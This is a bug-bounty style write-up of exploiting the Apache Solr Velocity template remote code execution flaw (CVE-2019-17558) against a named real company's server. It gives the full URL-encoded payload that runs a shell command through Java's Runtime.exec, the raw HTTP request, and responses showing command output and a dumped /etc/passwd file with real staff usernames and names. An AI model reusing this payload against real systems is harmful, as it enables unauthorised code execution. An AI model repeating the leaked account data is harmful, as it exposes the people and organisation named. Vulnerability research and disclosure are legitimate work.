CVE-2019–17558: Apache Solr Vulnerable to Remote Code Execution Zero-Day Vulnerability

Background

On October 29, a proof of concept (PoC) for a remote code execution (RCE) vulnerability in Apache Solr, a popular open-source search platform built on Apache Lucene, was published as a GitHub Gist. At the time this blog post was published, this vulnerability did not have a CVE identifier and no confirmation or indication of a solution available from Apache. However, Apache recently announced releases of Solr to address this vulnerability, which is now identified as CVE-2019–17558. Tenable Research confirmed that Apache Solr versions 7.7.2 through 8.3 were vulnerable at the time this blog post was originally published. After the announcement from Apache was released, we can now confirm versions 5.0.0 to 8.3.1 are affected.

Some tool I used to find this RCE

1-URL: platform in hackerone : https://hackerone.com/cengage

2- https://github.com/projectdiscovery/subfinder

3-DirBuster

#I used DirBuster to find other folder and directory

and after 20M DirBuster found this path /solr/ and I searched on google and HackerOne to Apache solr and after that, I found the same rce in HackerOne url:https://hackerone.com/reports/822002

and I tested on this path /solr/select?q=

command rce : 1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

/solr/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

HTTP request

GET /solr/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: cengage.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: 
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

HTTP response

HTTP/1.1 200 OK
Date: Thu, 14 Jan 2021 21:39:59 GMT
Server: Apache
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
X-OneAgent-JS-Injection: true
X-ruxit-JS-Agent: true
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Length: 36
 0 uid=6002(webadm) gid=555(webadm)

HTTP response

HTTP/1.1 200 OK
Date: Thu, 14 Jan 2021 21:46:13 GMT
Server: Apache
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
X-OneAgent-JS-Injection: true
X-ruxit-JS-Agent: true
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Length: 1794
 0 root:x:0:0:Super-User:/root:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
svctag:x:95:12:Service Tag UID:/:
unknown:x:96:96:Unknown Remote UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
jlouki01:x:100:1::/home/jlouki01:/bin/sh
nagios:x:525:525:Nagios Monitoring Account:/export/home/nagios:/bin/sh
usag:x:12112:12112:Unix Systems Administration Group:/export/home/usag:/bin/bash
cmpacadm:x:6005:213:Auto-Commit Admin:/compass/cmpacadm:/bin/bash
wharris:x:6004:10::/export/home/wharris:/bin/bash
pdharuri:x:6008:800::/export/home/pdharuri:/bin/bash
nisaac:x:6009:800::/export/home/nisaac:/bin/bash
webadm:x:6002:555::/wwwroot/weblogic:/bin/ksh
oracle:x:6001:1::/export/home/oracle:/bin/ksh
gandrade:x:8740:12112:Greg P. Andrade:/export/home/gandrade:/bin/bash
jhiler:x:12113:1::/export/home/jhiler:/bin/sh
zenos:x:336:336:Zenos Demon:/var/lib/zenos:/bin/bash
pimuser:x:8743:12113:PIM User Transfers:/wwwroot/pimuser:/bin/bash
sganapathy:x:6011:800:Cognizant Dev:/export/home/sganapathy:/bin/bash
pneog:x:12114:800:Cognizant Dev:/export/home/pneog:/bin/bash
mrajkumar:x:12115:800:Cognizant Dev:/export/home/mrajkumar:/bin/bash
cnakka:x:12116:800:Cognizant Dev:/export/home/cnakka:/bin/bash
svcdevice42:x:12117:1:Device42 - Service Account:/home/svcdevice42:/bin/sh

About me:

Ahmed Abdalkhaliq Abdulla

lu3ky13 is on @buymeacoffee! 🎉

You can support by buying a coffee ☕️ here —
https://www.buymeacoffee.com/lu3ky13